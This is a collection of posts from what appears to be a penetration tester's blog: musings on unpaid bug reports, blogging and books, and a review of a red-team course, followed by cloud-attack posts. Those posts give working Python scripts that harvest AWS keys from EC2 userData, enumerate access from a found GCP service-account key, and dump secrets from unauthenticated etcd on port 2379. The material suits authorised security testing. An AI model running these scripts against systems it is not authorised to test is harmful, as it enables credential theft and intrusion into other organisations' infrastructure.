I was relaying some frustrations to a close non-infosec friend about my experience of discovering  companies had made some fairly serious Internet security uh ohs... like misconfigured s3 buckets full of db backups and creds, root AWS keys checked into github, or slack tokens checked into github/pastebin that would give companies a "REALLY bad day".  These companies had been receptive to the reporting and fixed the problem but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.

My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.

So this blog post is an attempt for me to work thru some of these issues and have a discussion about the topics.


Questions I don't necessarily have answers for:

1. Does a vulnerability I wasn't asked to find have value?

2. If someone outside your company reports an issue and you fix it, does that issue/report now have value/deserve to be paid for (bug bounty)?

3a. If #1 or #2 is Yes, when a business doesn't have a Bug Bounty program, are they morally/ethically/peer pressure obligated to pay something?  If they have a BB program I think most people agree yes. But what about when they don't?

3b. Does the size of the business make a difference? If so, what level?  mom and pop maybe not, VC funded startup?  30 billion dollar Hedge Fund?

4. Is a "Thanks Bro!" enough or have we evolved as a society where basically everything deserves some sort of monetary reward. After being an observer for two BB programs...."f**k you pay me" seems to be the current attitude. If they did a public "Thanks Bro" does that make a difference/satisfy my ego?

5a. Is "making the Internet safer" enough of a reward?

5b. Does a company with an open S3 bucket make the Internet less safe? Does a company leaking client data make the Internet less safe? [I think Yes]
Does a company leaking their OWN data make the Internet less safe? [It's good for their competitors]

If they get ransomware'd or their EC2 infra shut down/turned off/deleted codespaces style, am I somewhat (morally) responsible if I didn't report it?

6. Does ignoring a pretty significant issue for a company make me a "bad person"?

7a. Am I a "bad person" if I want $$$ for reporting the issue?

7b. If yes, is that because I make $X and I'm being a greedy bastard? What if I made way less money?

7c. Does ignoring/not reporting an issue because I probably won't get $$ make me a "bad person"? Numbers 1-3 come into play here for sure.


My last two jobs, I've worked for companies that had Bug Bounty programs, so my opinion on the above is DEFINITELY shaped by working for companies that get it, understand and care about their security posture, and feel that reporting of security issues by outside researchers has monetary value. An added benefit to having a program, especially through one of the BB vendors, is that you get to NDA the researchers and you get to control disclosure.


Thoughts/comments VERY welcome on this one.  Leaving comments seems out of style now but I do have open DM on twitter if you want to go that route.  I have a few real world experiences with this where I let some companies know some pretty serious stuff (slack token with access to corp slack, S3 buckets with creds/db backups, and root aws keys checked into github for weeks) where it was fixed with no drama but no bounty paid.


-CG

Follow up to the vuln disclosure post

Summary of responses from this post: http://carnal0wnage.attackresearch.com/2017/06/vulnerability-disclosure-free-bug.html

I wanted to document/summarize some of the responses I received and some of the insights I gained via self observation and my interactions with others on the topic.

I received a few replies (less than I hoped for though). To summarize a few:

-I'm not a greedy bastard for thinking it would "be nice" to get paid for reporting a vuln but I should not expect them.

-Bug Bounty awards are appreciation for the work not a right.

-Someone made a nice analogy to losing AWS/Slack keys to losing a cell phone or cat.  Every person might value the return of that cat or phone differently.

-I'm super late to the game if I want to get on the "complain about bug bounties / compensation" train.  **I think this is not quite the same situation but I appreciate the comment**

-The bigger the company, the harder it is to issue an ad-hoc reward if they don't have an established process.

-They [the vulns] have value - just not monetary. The value is to the end-user.

-Generally speaking, I [the author of the comment] think quite a lot of the BB crowd have a self-entitled, bad attitude.

-Always ask yourself if this will hurt innocent people. If so, report it, but make sure the public knows that they f*cked it up.

This blog post reply: https://blog.anantshri.info/response-vulnerability-disclosure-free-bug-reports-greedy-bastard/
---

I got a variety of responses, from "it's the right thing to do"... up to "if they don't pay up, they don't get the info". Collectively, I don't think we are any closer to an answer.

To get a bit more personal on the subject. I think this piece from Ferris Bueller's Day Off sums it up to an extent:

https://www.youtube.com/watch?v=H19uKs99vIw&feature=youtu.be&t=1m15s

"The problem is with me"


I've been giving quite a bit of thought to what component of the process brings me the most excitement and enjoyment.  I believe I have identified what component brings me the most enjoyment and will focus on that piece and work to manage any expectations I place on others.

I very much appreciate everyone that engaged in the conversation with me.

More things to think about for sure :-)







Certutil for delivery of files

Mentoring: On Blogging

Received the question about blogging. More specifically:
  • How and Why
  • How to benefit from blogging
  • How to be consistent with posting
In my mind, the key to success and blogging is to be totally selfish in its planning and execution.

Blogging is a personal activity/journey that you allow the public to be a part of. What I mean by this is that the main audience for your blog should be YOU. My blog is a place where I take notes and occasionally try to talk about more touchy-feely topics or issues. These notes are notes that I'm ok with sharing publicly. I also keep a private blog (but really more notes/cheat-sheet, think RTFM...I use MDwiki) because you don't need to give everyone all your tricks and secrets. If you show up for a new job and everyone knows your tricks because you've shared them publicly (because you need attention from strangers) what value are you bringing to your employer?

The benefit to blogging is note taking. I'm a HUGE proponent of taking notes and I'd chalk a lot of my success up to taking copious notes.  When I figure out how to mess with technology X, I take notes on it. As a consultant, it may be months or years before I see it again.  Having notes to go back to saves time and stress.  It also allows me to help people on my team in the event they run into it while I am on a different project.

How/Platforms: I use Blogger because I don't want to secure/worry about my blogging platform. This blog was on Drupal for a bit and some jerk decided to make an example of the blog's lack of updates publicly at BlackHat (appreciate the heads up...#totallynotbitter). With Blogger, hosted WordPress, or some other hosted platform I'm offloading the risk and I don't have to worry about keeping up with patches.

Consistently posting. No idea. It's clear I have lost the ability to consistently post. I do sometimes queue up a bunch of posts and schedule their posting.  I've found it was easier to find things to blog about when I was consulting since I had a different client every week so it would be difficult to tie a vulnerability back to any particular client.  Now that I work for a company, if I'm talking about some vulnerability or exploit I used there is a good chance I used it for work; potentially exposing the company to risk.

Length.  No one reads long posts.  Break long posts into separate logical posts even if you choose to post them at the same time.


Also see the "On Social Media" post (Todo)

Also
https://www.j4vv4d.com/a-blog-about-blogging-with-bloggers/

Also see this timely tweet by Robin Wood
https://twitter.com/digininja/status/900340713669279745

Books I'd give to my 30yr old self

A good friend/co-worker recently turned 30.  In preparation for his birthday party I gave some thought to my 30th birthday and the things I now know or have an idea about and what I wish I had known at that point in my life.

I decided to buy him a few books that had impacted my life since my 30th birthday and that I wish I had known about or read earlier in life.

I'll split the post into two parts; computer books and life/metaphysical books.

Computer books

This is by no means an exhaustive list.  A more exhaustive list can be found here (recently updated).

He already had The Web Application Hacker's Handbook but had he not I would have purchased a copy for him.  There are lots of Web Hacking books but WAHH is probably the best and most comprehensive one.

The other books I did purchase were The Phoenix Project  and Zero to One.

The Phoenix Project is absolutely one of the best tech books I've read in the last few years.  Working for  Silicon Valley companies I think it can be easy to take for granted the whole idea of DevOps and the power it brings when you can do infrastructure as code, micro services, and the flexibility DevOps can bring to prototyping and developing code and projects.  There is also the "security guy" in the story that serves as the guy we never want to be but sometimes end up being unbeknownst to us.

The running joke is that Zero to One is in the Hipster starter kit but I thought it was a great book.  The quick summary is that Peter Thiel describes businesses that iterate on a known problem and can be successful and there are businesses that create solutions to problems we didn't know we had. Examples of the latter being companies like Google, Facebook, PayPal, Uber.  It's a short book and should be required reading for anyone thinking of starting a business.


The following is life stuff, so if all you care about is tech shit, feel free to eject at this point.















still here?

Metaphysics

1st, Many Lives Many Masters by Brian Weiss.  A nice, gentle introduction to the idea that we reincarnate and have eternal souls.  Written by a psychiatrist who more or less stumbled into the fact that people have past lives while doing normal psychiatry work.

From Amazon:
"As a traditional psychotherapist, Dr. Brian Weiss was astonished and skeptical when one of his patients began recalling past-life traumas that seemed to hold the key to her recurring nightmares and anxiety attacks. His skepticism was eroded, however, when she began to channel messages from the “space between lives,” which contained remarkable revelations about Dr. Weiss’ family and his dead son. Using past-life therapy, he was able to cure the patient and embark on a new, more meaningful phase of his own career."


2nd,  A New Earth by Eckhart Tolle. This is the best book I read in 2016 and I've been sharing it with everyone I can.  Everyone in infosec should read this book to understand the way the ego works in our day to day lives.

From Amazon:
In A New Earth, Tolle expands on these powerful ideas to show how transcending our ego-based state of consciousness is not only essential to personal happiness, but also the key to ending conflict and suffering throughout the world. Tolle describes how our attachment to the ego creates the dysfunction that leads to anger, jealousy, and unhappiness, and shows readers how to awaken to a new state of consciousness and follow the path to a truly fulfilling existence.

3rd, Self Observation by Red Hawk. The practical application guide if you got something from A New Earth.  An instruction manual around self-observation.

From Amazon:
"This book is an in-depth examination of the much needed process of 'self'-study known as self observation. We live in an age where the "attention function" in the brain has been badly damaged by TV and computers - up to 90 percent of the public under age 35 suffers from attention-deficit disorder! This book offers the most direct, non-pharmaceutical means of healing attention dysfunction. The methods presented here are capable of restoring attention to a fully functional and powerful tool for success in life and relationships. This is also an age when humanity has lost its connection with conscience. When humanity has poisoned the Earth's atmosphere, water, air and soil, when cancer is in epidemic proportions and is mainly an environmental illness, the author asks: What is the root cause? And he boldly answers: failure to develop conscience! Self-observation, he asserts, is the most ancient, scientific, and proven means to develop this crucial inner guide to awakening and a moral life. This book is for the lay-reader, both the beginner and the advanced student of self observation. No other book on the market examines this practice in such detail. There are hundreds of books on self-help and meditation, but almost none on self-study via self observation, and none with the depth of analysis, wealth of explication, and richness of experience which this book offers."

Finance

Rich Dad Poor Dad, I talked about this in 2013:  http://carnal0wnage.attackresearch.com/2013/12/best-non-technical-book-i-read-this-year.html

Dark Side Ops I & II Review

Dark Side Ops I
https://silentbreaksecurity.com/training/dark-side-ops/
https://www.blackhat.com/us-17/training/dark-side-ops-custom-penetration-testing.html 

A really good overview of the class is here https://www.ethicalhacker.net/features/root/course-review-dark-side-ops-custom-penetration-testing

I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-)

I’ll try not to cover what is in Raphael’s article as it is still applicable and I am assuming you read it before continuing on.

I really enjoyed the Visual Studio time and building Slingshot and Throwback myself along with getting a taste for extending the implant by adding the keylogger, mimikatz, and hashdump modules.

Windows API developers may be able to greatly extend slingshot but I don't think I have enough WinAPI kung fu to do it and there wasn’t enough setup around the “how” to consistently do it either unless you have a strong windows API background. However, one of the labs consisted of adding load and run powershell functionality which allows you to make use of the plethora of powershell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class.

The Visual Studio piece can get overwhelming but it definitely gives you a big taste of (Windows) implant development.  The class materials are getting slightly dated in some cases.  A refresh might be helpful.  More Throwback usage & development would be fun (even as optional labs).


DSO II
https://silentbreaksecurity.com/training/dark-side-ops-2-adversary-simulation/ 
https://www.blackhat.com/us-17/training/dark-side-ops-ii-adversary-simulation.html 

Lab one was getting a fresh copy of slingshot back up and running and then setting up some additional code to do a powershell web cradle to get our slingshot implant up and running on a remote host. Similar to how metasploit web delivery does things.



Lab 2 was doing some devops to set up servers, OpenVPN to tunnel traffic, and adding HTTPS to our slingshot codebase.

Lab 3 was some Initial activity labs (HTA and chrome plugin exploitation)





Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code to do sandbox evasions as it’s becoming more common for automated sandbox solutions to be tied to mail gateways or  just for people doing response.

Lab 5 was whitelist bypassing

Lab 6 was doing some profiling via powershell and using slingshot to be able to do checks on the host

Labs 7-9 were building a kernel rootkit



Lab 10 persistence via COM Hijacking and hiding our custom DLL in the registry and Lab 11 was privilege escalation via custom service.

Final Thoughts

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

Criticisms:
I think the set of courses is having a bit of an identity crisis mostly due to the 2 day format and would be a much better class as a 5 day.  It is heavily development focused meaning you spend a lot of time in Visual Studio tweaking C code. The “operations” piece of the course definitely suffers a bit due to all the dev time. There was minimal talk around lateral movement and the whole thing is entirely Windows focused so no Linux and no OSX.  A suggestion to fix the “ops” piece would be to have a Dark Side Ops - Dev and Dark Side Ops - Operator course where the dev one is solely deving your implant and the Operator course would be solely using the implant you dev’d (or was provided to you).  The Silent Break team definitely knows their stuff and a longer class format or switch up would allow them to showcase that more efficiently.





AWS EC2 instance userData

In the effort to get me blogging again I'll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general I thought metadata was only things you can hit from WITHIN the instance via the metadata url: http://169.254.169.254/latest/meta-data/

However, if you read the link above, there is also user data: a script or set of parameters supplied when the instance is launched. It is readable from inside the instance at http://169.254.169.254/latest/user-data and, the interesting part here, from outside it through the EC2 API by anyone whose credentials allow ec2:DescribeInstanceAttribute.


You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script. 

That's interesting right?!?!  So if you have some AWS creds, the easiest way to check for this (after you enumerate instance IDs) is with the aws cli.

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID 'i-0XXXXXXXX' does not exist

ah crap, you need the region...

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX --region us-west-1
{
    "InstanceId": "i-0XXXXXXXX",
    "UserData": {
        "Value": "bm90IHRvZGF5IElTSVMgOi0p"
    }
}

The Value comes back base64-encoded, so decode it before reading it.

Anyway, that can get tedious especially if the org has a ton of things running.  This is precisely the reason @cktricky and I built weirdAAL.  Surely no one would be sticking creds into things at boot time via shell scripts :-)


The module loops through all the regions and any instances it finds and queries for the userData attribute.  Hurray for automation.

That module is in the current version of weirdAAL. Enjoy.
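As an added example (my code, not weirdAAL's module), here is the same idea in Python: walk every region and instance, pull the userData attribute, base64-decode it and grep the result for credential patterns. The sample response at the bottom is constructed and uses the AWS documentation example key pair, not a real credential; the boto3 import is deferred so the decoding and matching helpers run offline.

```python
"""Pull EC2 user data from every region and flag anything that looks like a
credential.  Added example (not weirdAAL code); boto3 is only imported inside
scan_account(), so the parsing helpers work offline."""
import base64
import re

# Patterns worth grepping user data for.  The access-key format (AKIA/ASIA + 16
# uppercase/digits) is documented by AWS; the rest are generic heuristics.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})"),
    "password_assignment": re.compile(
        r"(?i)\b(password|passwd|pwd|secret|token)\b\s*[=:]\s*['\"]?(\S{6,})"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def decode_user_data(attr_response):
    """describe-instance-attribute returns UserData.Value base64-encoded.
    Returns the decoded text, or '' when the instance has no user data."""
    value = (attr_response.get("UserData") or {}).get("Value")
    if not value:
        return ""
    return base64.b64decode(value).decode("utf-8", errors="replace")


def find_secrets(text):
    """[(label, matched text)] for every pattern hit, in SECRET_PATTERNS order."""
    hits = []
    for label, pat in SECRET_PATTERNS.items():
        for m in pat.finditer(text):
            hits.append((label, m.group(0)))
    return hits


def scan_account(regions=None):
    """Yield (region, instance_id, hits) for every instance the creds can see.
    Needs ec2:DescribeRegions, ec2:DescribeInstances, ec2:DescribeInstanceAttribute."""
    import boto3  # deferred so the helpers above stay usable without boto3
    ec2 = boto3.client("ec2", region_name="us-east-1")
    regions = regions or [r["RegionName"] for r in ec2.describe_regions()["Regions"]]
    for region in regions:
        client = boto3.client("ec2", region_name=region)
        for page in client.get_paginator("describe_instances").paginate():
            for reservation in page["Reservations"]:
                for inst in reservation["Instances"]:
                    iid = inst["InstanceId"]
                    attr = client.describe_instance_attribute(
                        InstanceId=iid, Attribute="userData")
                    yield region, iid, find_secrets(decode_user_data(attr))


# Constructed sample: a bootstrap script that bakes in the AWS documentation
# example key pair (not a live credential).
SAMPLE_SCRIPT = """#!/bin/bash
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws s3 cp s3://internal-bootstrap/app.tar.gz /opt/
"""
SAMPLE_RESPONSE = {
    "InstanceId": "i-0XXXXXXXX",
    "UserData": {"Value": base64.b64encode(SAMPLE_SCRIPT.encode()).decode()},
}

if __name__ == "__main__":
    for label, match in find_secrets(decode_user_data(SAMPLE_RESPONSE)):
        print(f"{label}: {match}")
```

Run it without arguments and it triages the constructed sample; against a real account, iterate `scan_account()` and report only the instances whose hit list is non-empty.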

-CG

I found a GCP service account token...now what?

Google Cloud Platform (GCP) is rapidly growing in popularity and I haven't seen too many posts on f**king it up so I'm going to do at least one :-)

Google has several ways to do authentication but most likely what you are going to come across shoved into code somewhere or in dotfiles is a service account json file.

It's going to look similar to this:

These service account files are similar to AWS tokens in that it can be difficult to determine what they have access to if you don't already have console and/or IAM access. However, with a little bit of scripting we can brute force at least some of the token's functionality pretty quickly: try each service's list call and see which ones succeed. The issue is that a service account key for something like GCP Compute looks the same as one made to manage a calendar or any of the hundreds of other Google services.

You'll need to install the gcloud tools for your OS. Info here:  https://cloud.google.com/sdk/

Once you have the gcloud suite of tools installed you can auth with the json file with the following command:

gcloud auth activate-service-account --key-file=KEY_FILE

If the key is invalid you'll see something like the below:

gcloud auth activate-service-account --key-file=21.json
ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: invalid_grant: Not a valid email or user ID.

Otherwise it will look similar to below:

gcloud auth activate-service-account --key-file=/Users/CG/Documents/pentest/gcp-weirdaal/gcp.json
Activated service account credentials for: [python@removed.iam.gserviceaccount.com]

you can validate it worked by issuing gcloud auth list command:

gcloud auth list
                  Credentialed Accounts
ACTIVE  ACCOUNT

*       python@removed.iam.gserviceaccount.com


I put together a shell script that runs through a bunch of commands to enumerate information. The only info you need to provide is the project name. This can be found in the json file in the project_id field or by issuing the gcloud projects list command.  Sometimes there are multiple projects associated with an account and you'd need to run the shell script once for each project.

The first time you run these API calls you might need to pass a "Y" to the CLI to enable the API on the project. You can get around these manual shenanigans by doing a:

yes | ./gcp_enum.sh 

This will answer yes for you each time :-)

Keep in mind what that yes does: it enables the API in the target project, which is a change to their environment and one that shows up in the project's audit logs. Decide up front whether that is acceptable for the engagement.
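As an added example (my code, not the post's gcp_enum.sh), the same enumeration in Python: sanity-check the key file's shape, activate it, list every project the account can see, and run a set of read-only gcloud/gsutil listings against each. The commands are real CLI commands; which of them succeed is exactly what tells you what the account can do. The sample key is constructed with a placeholder private key, and `--quiet` replaces the `yes` pipe so gcloud takes the default "No" on the enable-API prompt instead of modifying the target project.

```python
"""Triage a found GCP service-account key file and drive read-only gcloud
enumeration from it.  Added example, not the post's gcp_enum.sh: stdlib only,
and gcloud/gsutil are only executed from list_projects()/enumerate_project()."""
import json
import shlex
import subprocess

REQUIRED_FIELDS = ("type", "project_id", "private_key_id", "private_key", "client_email")


def load_key(path):
    with open(path) as fh:
        return json.load(fh)


def validate_key(key):
    """Return a list of problems; empty means the file has the shape of a
    service-account key (it says nothing about whether it still works)."""
    problems = ["missing " + f for f in REQUIRED_FIELDS if f not in key]
    if key.get("type") != "service_account":
        problems.append("type is %r, not 'service_account'" % key.get("type"))
    if not str(key.get("client_email", "")).endswith(".iam.gserviceaccount.com"):
        problems.append("client_email is not a service-account address")
    if not str(key.get("private_key", "")).startswith("-----BEGIN PRIVATE KEY-----"):
        problems.append("private_key is not a PEM PKCS#8 block")
    return problems


def enum_commands(project):
    """Read-only listings worth trying; which succeed depends on the account's roles."""
    p = shlex.quote(project)
    return [
        f"gcloud projects get-iam-policy {p}",
        f"gcloud iam service-accounts list --project {p}",
        f"gcloud compute instances list --project {p}",
        f"gcloud compute firewall-rules list --project {p}",
        f"gcloud container clusters list --project {p}",
        f"gcloud sql instances list --project {p}",
        f"gcloud functions list --project {p}",
        f"gcloud secrets list --project {p}",
        f"gsutil ls -p {p}",
    ]


def _run(argv, runner):
    # --quiet makes gcloud take the default answer to every prompt, so an API that
    # is not enabled fails loudly instead of being switched on in the target
    # project (a change that is audit-logged there).  gsutil has no such flag.
    if argv[0] == "gcloud":
        argv = argv + ["--quiet"]
    return runner(argv, capture_output=True, text=True)


def list_projects(runner=subprocess.run):
    """Projects the active account can see; may be more than the key's project_id."""
    proc = _run(["gcloud", "projects", "list", "--format=value(projectId)"], runner)
    return proc.stdout.split() if proc.returncode == 0 else []


def enumerate_project(project, runner=subprocess.run):
    """{command: stdout, or 'FAILED: stderr' when the account lacks the permission}."""
    results = {}
    for cmd in enum_commands(project):
        proc = _run(shlex.split(cmd), runner)
        results[cmd] = proc.stdout if proc.returncode == 0 else "FAILED: " + proc.stderr.strip()
    return results


def run_enum(key_path, runner=subprocess.run):
    """Validate the key, activate it, then enumerate every visible project."""
    key = load_key(key_path)
    problems = validate_key(key)
    if problems:
        raise ValueError("; ".join(problems))
    runner(["gcloud", "auth", "activate-service-account", "--key-file=" + key_path], check=True)
    projects = list_projects(runner) or [key["project_id"]]
    return {proj: enumerate_project(proj, runner) for proj in projects}


# Constructed sample with the shape of a real key file (the private key is a placeholder).
SAMPLE_KEY = {
    "type": "service_account",
    "project_id": "removed-project",
    "private_key_id": "0123456789abcdef",
    "private_key": "-----BEGIN PRIVATE KEY-----\nCONSTRUCTED-PLACEHOLDER-NOT-A-KEY\n-----END PRIVATE KEY-----\n",
    "client_email": "python@removed.iam.gserviceaccount.com",
    "client_id": "1234567890",
    "token_uri": "https://oauth2.googleapis.com/token",
}

if __name__ == "__main__":
    import sys
    print(json.dumps(run_enum(sys.argv[1]), indent=2))
```

The `runner` parameter exists so the command plumbing can be exercised with a fake `subprocess.run`; in real use leave it at the default and read the FAILED entries as the negative space of the account's permissions.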






NCC Group also has two tools you could check out:

https://github.com/nccgroup/G-Scout

and

https://github.com/nccgroup/ScoutSuite


enjoy

CG

Kubernetes: kube-hunter.py etcd


I mentioned a few auditing tools in the master post. Kube-Hunter is one that is pretty OK.  You can use it to quickly scan for multiple Kubernetes issues.


Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.

----------

Nodes
+-------------+----------------+
| TYPE        | LOCATION       |
+-------------+----------------+
| Node/Master | 1.2.3.4        |
+-------------+----------------+

Detected Services
+---------+---------------------+----------------------+
| SERVICE | LOCATION            | DESCRIPTION          |
+---------+---------------------+----------------------+
| Etcd    | 1.2.3.4:2379        | Etcd is a DB that    |
|         |                     | stores cluster's     |
|         |                     | data, it contains    |
|         |                     | configuration and    |
|         |                     | current state        |
|         |                     | information, and     |
|         |                     | might contain        |
|         |                     | secrets              |
+---------+---------------------+----------------------+

Vulnerabilities
+--------------+------------------+----------------------+---------------------+--------------------------+
| LOCATION     | CATEGORY         | VULNERABILITY        | DESCRIPTION         | EVIDENCE                 |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Unauthenticated  | Etcd is accessible   | Etcd is accessible  | {"etcdserver":"3.3.9     |
|              | Access           | using insecure       | using HTTP (without | ","etcdcluster":"3.3     |
|              |                  | connection (HTTP)    | authorization and   | ...                      |
|              |                  |                      | authentication), it |                          |
|              |                  |                      | would allow a       |                          |
|              |                  |                      | potential attacker  |                          |
|              |                  |                      | to                  |                          |
|              |                  |                      |     gain access to  |                          |
|              |                  |                      | the etcd            |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Information      | Etcd Remote version  | Remote version      | {"etcdserver":"3.3.9     |
|              | Disclosure       | disclosure           | disclosure might    | ","etcdcluster":"3.3     |
|              |                  |                      | give an attacker a  | ...                      |
|              |                  |                      | valuable data to    |                          |
|              |                  |                      | attack a cluster    |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Access Risk      | Etcd Remote Read     | Remote read access  | {"action":"get","nod     |
|              |                  | Access Event         | might expose to an  | e":{"dir":true,"node     |
|              |                  |                      | attacker cluster's  | ...                      |
|              |                  |                      | possible exploits,  |                          |
|              |                  |                      | secrets and more.   |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+

Kubernetes: open etcd

Quick post on Kubernetes and open etcd (port 2379)

"etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."

-from: https://coreos.com/blog/introducing-the-etcd-operator.html 

What this means in English is that etcd stores the current state of the Kubernetes cluster, usually including the Kubernetes tokens and passwords: Secrets live under /registry/secrets/ and sit there unencrypted unless encryption at rest has been turned on in the API server.  If you check out the following references you can get a sense for the pain level that could potentially be involved. At minimum you get network info or running pods, and at best credentials.

refs: 
https://techbeacon.com/hackers-guide-kubernetes-security 
https://elweb.co/the-security-footgun-in-etcd/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/

The second link talks extensively about the types of info they found when they hit all the Shodan endpoints for 2379 and analyzed the results.

If you manage to find open etcd, the easiest way to check for creds is a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true

One caveat: that is the v2 API. Kubernetes 1.6 and later keeps its state in the v3 keyspace, which the v2 endpoint does not show, so a boring or empty v2 listing does not mean the store is empty. Query v3 as well, either with etcdctl (ETCDCTL_API=3, get / --prefix) or through the gRPC-JSON gateway at /v3/kv/range (/v3beta on etcd 3.3, /v3alpha on 3.2).
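As an added example (my code, not from the post), a small dumper that hits both APIs on an open etcd, merges the results and flags entries whose key or value looks credential-bearing. The two sample responses are constructed to match the shape of the v2 tree and the v3 gateway reply; the `fetch()` function is the only part that touches the network.

```python
"""Dump an open etcd on 2379 and flag entries that look like Kubernetes
credentials.  Added example, not from the post; stdlib only.  Kubernetes 1.6+
stores its state through the etcd v3 API, so /v2/keys can look empty while
/registry/ is full of secrets: both APIs are queried and the results merged."""
import base64
import json
import re
import urllib.request

# Keys or values that usually mean credentials when they turn up in etcd.
INTERESTING = re.compile(
    r"(?i)(/registry/secrets/|serviceaccount|token|password|passwd|kubeconfig|BEGIN [A-Z ]*PRIVATE KEY)"
)


def flatten_v2(node, out=None):
    """Flatten the nested 'node' tree of GET /v2/keys/?recursive=true into {key: value}."""
    out = {} if out is None else out
    if node.get("dir"):
        for child in node.get("nodes", []):
            flatten_v2(child, out)
    elif "key" in node:
        out[node["key"]] = node.get("value", "")
    return out


def decode_v3_range(body):
    """POST /v3/kv/range (gRPC-JSON gateway) returns base64 keys and values."""
    out = {}
    for kv in body.get("kvs", []):
        key = base64.b64decode(kv["key"]).decode("utf-8", "replace")
        val = base64.b64decode(kv.get("value", "")).decode("utf-8", "replace")
        out[key] = val
    return out


def triage(kv):
    """[(key, first 80 chars of value)] for credential-looking entries, sorted by key."""
    return [(k, v[:80]) for k, v in sorted(kv.items())
            if INTERESTING.search(k) or INTERESTING.search(v)]


def fetch(endpoint, timeout=10):
    """endpoint is e.g. http://1.2.3.4:2379 (plain HTTP, no auth: the misconfiguration
    the post is about).  The gateway prefix depends on the etcd version:
    /v3 for 3.4+, /v3beta for 3.3, /v3alpha for 3.2."""
    found = {}
    try:
        with urllib.request.urlopen(endpoint + "/v2/keys/?recursive=true", timeout=timeout) as r:
            found.update(flatten_v2(json.load(r).get("node", {})))
    except Exception:
        pass  # v2 API disabled or absent; fall through to v3
    # key="\0", range_end="\0" (base64 "AA==") selects every key in the store.
    payload = json.dumps({"key": "AA==", "range_end": "AA=="}).encode()
    for prefix in ("v3", "v3beta", "v3alpha"):
        req = urllib.request.Request(f"{endpoint}/{prefix}/kv/range", data=payload, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as r:
                found.update(decode_v3_range(json.load(r)))
                break
        except Exception:
            continue
    return found


# Constructed responses with the shape of the two APIs (not captured from a real cluster).
SAMPLE_V2 = {"action": "get", "node": {"dir": True, "nodes": [
    {"key": "/coreos.com/network/config", "value": '{"Network":"10.244.0.0/16"}'},
    {"key": "/app", "dir": True, "nodes": [{"key": "/app/db_password", "value": "hunter2"}]},
]}}
SAMPLE_V3 = {"header": {"cluster_id": "1"}, "kvs": [
    {"key": base64.b64encode(b"/registry/secrets/kube-system/bootstrap-token-abcdef").decode(),
     "value": base64.b64encode(b"k8s\x00constructed-protobuf-placeholder").decode()},
    {"key": base64.b64encode(b"/registry/configmaps/default/app-config").decode(),
     "value": base64.b64encode(b"k8s\x00constructed-protobuf-placeholder").decode()},
]}

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        kv = fetch(sys.argv[1])
    else:
        kv = {**flatten_v2(SAMPLE_V2["node"]), **decode_v3_range(SAMPLE_V3)}
    for key, snippet in triage(kv):
        print(key, "=>", snippet)
```

Values under /registry/ are Kubernetes' protobuf encoding, so the snippet is only a hint; the key path (namespace and secret name) is usually the useful part, and etcdctl or kubectl is the right tool for decoding the object itself.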

Example Loot - 

Usually it's boring stuff like this:



But occasionally you'll get more interesting things like:



or more fun things like kubelet tokens:




Kubernetes: cAdvisor

"cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."

Runs on port 4194. On Kubernetes that port was the kubelet's embedded cAdvisor; the kubelet flag that exposed it (--cadvisor-port) was removed in 1.12, so on newer clusters you are more likely to find cAdvisor as a standalone daemon, or its metrics behind the kubelet's own port at /metrics/cadvisor.

Links:
https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/
